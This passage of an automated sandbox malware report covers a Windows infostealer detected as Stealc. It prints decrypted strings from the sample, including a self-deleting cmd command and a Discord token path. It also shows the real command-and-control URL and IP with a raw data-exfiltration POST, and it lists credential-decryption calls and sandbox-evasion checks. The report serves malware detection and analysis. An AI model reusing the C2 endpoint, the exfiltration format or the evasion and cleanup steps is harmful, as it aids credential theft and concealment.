                Source: 0.2.file.exe.20000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.20000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.20000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.20000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.20000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.20000.0.unpackString decryptor: https
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.20000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.20000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.20000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.20000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.20000.0.unpackString decryptor: build
                Source: 0.2.file.exe.20000.0.unpackString decryptor: token
                Source: 0.2.file.exe.20000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.20000.0.unpackString decryptor: file
                Source: 0.2.file.exe.20000.0.unpackString decryptor: message
                Source: 0.2.file.exe.20000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.20000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00039030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0002A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000272A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000272A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0002A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0002C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000340F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000340F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0002E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00021710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00021710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000347C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000347C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00033B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00033B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00034B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00034B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0002DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0002EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0002BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0002DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 36 46 43 41 34 37 37 30 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"D06FCA4770BC4158135236------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"tale------KJKEHIIJJECFHJKECFHD--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000262D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_000262D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 36 46 43 41 34 37 37 30 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"D06FCA4770BC4158135236------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"tale------KJKEHIIJJECFHJKECFHD--
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1800359502.0000000001016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1800359502.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpa-
                Source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000600980_2_00060098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040317A0_2_0040317A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000521380_2_00052138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004761180_2_00476118
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007B1980_2_0007B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008E2580_2_0008E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000642880_2_00064288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000AB3080_2_000AB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047B37C0_2_0047B37C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0009D39E0_2_0009D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0046F4E40_2_0046F4E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003724CD0_2_003724CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0004E5440_2_0004E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000445730_2_00044573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008D5A80_2_0008D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000645A80_2_000645A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A36210_2_003A3621
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0009A6480_2_0009A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000666C80_2_000666C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A96FD0_2_000A96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007D7200_2_0007D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000967990_2_00096799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0048379E0_2_0048379E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042C7A90_2_0042C7A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000748680_2_00074868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007B8A80_2_0007B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004658FB0_2_004658FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000798B80_2_000798B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008F8D60_2_0008F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0044E8A70_2_0044E8A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036D9E50_2_0036D9E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B7A290_2_003B7A29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00090B880_2_00090B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00358BBD0_2_00358BBD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00094BA80_2_00094BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0047EBF60_2_0047EBF6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0009AC280_2_0009AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00477C170_2_00477C17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0008AD380_2_0008AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0007BD680_2_0007BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00051D780_2_00051D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00075DB90_2_00075DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00074DC80_2_00074DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00471D9B0_2_00471D9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00479DB90_2_00479DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00068E780_2_00068E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00481E8F0_2_00481E8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00091EE80_2_00091EE8
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00024610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: tnleqdlj ZLIB complexity 0.9949933236506746
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00039790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00033970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00033970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\CV4CISNX.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2146304 > 1048576
                Source: file.exeStatic PE information: Raw size of tnleqdlj is bigger than: 0x100000 < 0x1a0e00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1756543501.0000000004E5B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tnleqdlj:EW;afcdkohf:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00039BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x210957 should be: 0x21529d
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: tnleqdlj
                Source: file.exeStatic PE information: section name: afcdkohf
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B905B push edx; mov dword ptr [esp], esi0_2_004B9064
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B905B push esi; mov dword ptr [esp], esp0_2_004B9068
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B905B push esi; mov dword ptr [esp], ecx0_2_004B927E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005680D4 push edi; mov dword ptr [esp], 788E1011h0_2_00568101
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005680D4 push ebx; mov dword ptr [esp], ecx0_2_00568115
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B00F2 push eax; mov dword ptr [esp], ebx0_2_004B010E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B00F2 push esi; mov dword ptr [esp], ecx0_2_004B013B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004B00F2 push 433B288Ah; mov dword ptr [esp], ebx0_2_004B01CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A109D push ebp; mov dword ptr [esp], edx0_2_004A11AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0004A0DC push eax; retf 0_2_0004A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0004A0F2 push eax; retf 0_2_0004A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00496178 push 4FB4AD30h; mov dword ptr [esp], esp0_2_00499740
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040317A push ebx; mov dword ptr [esp], ecx0_2_004032D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053D11C push 2BB63691h; mov dword ptr [esp], esp0_2_0053D142
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push edi; mov dword ptr [esp], 04BB119Ch0_2_00476138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push 0C83DC39h; mov dword ptr [esp], esi0_2_00476208
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebp; mov dword ptr [esp], eax0_2_00476275
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push 12EFEBDCh; mov dword ptr [esp], ebp0_2_00476405
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebx; mov dword ptr [esp], eax0_2_00476420
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebx; mov dword ptr [esp], 7131D4B2h0_2_00476582
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebx; mov dword ptr [esp], esi0_2_00476596
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebp; mov dword ptr [esp], 0819E69Ah0_2_0047659A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push edi; mov dword ptr [esp], ecx0_2_004765C6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebp; mov dword ptr [esp], 010F8192h0_2_00476627
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push 177F1F12h; mov dword ptr [esp], edx0_2_004766DD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ecx; mov dword ptr [esp], edi0_2_004766E1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push esi; mov dword ptr [esp], eax0_2_00476741
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebp; mov dword ptr [esp], esi0_2_00476788
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push 3E99096Ch; mov dword ptr [esp], eax0_2_00476920
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push ebx; mov dword ptr [esp], edx0_2_00476924
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00476118 push 635F0E2Fh; mov dword ptr [esp], edi0_2_0047693A
                Source: file.exeStatic PE information: section name: tnleqdlj entropy: 7.955054294676287

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00039BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00039BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36239
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4878A9 second address: 4878AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4878AD second address: 4878B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487B48 second address: 487B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 487E3B second address: 487E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BA8C second address: 48BAAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3D90D93B4Ah 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F3D90D93B54h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BAAC second address: 48BAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BB84 second address: 48BB9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F3D90D93B4Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BB9A second address: 48BBA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48BBA4 second address: 48BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F3D90D93B46h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47FCEB second address: 47FCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47FCF0 second address: 47FCFA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3D90D93B4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 47FCFA second address: 47FD34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F3D90F37F48h 0x00000011 pushad 0x00000012 jmp 00007F3D90F37F23h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
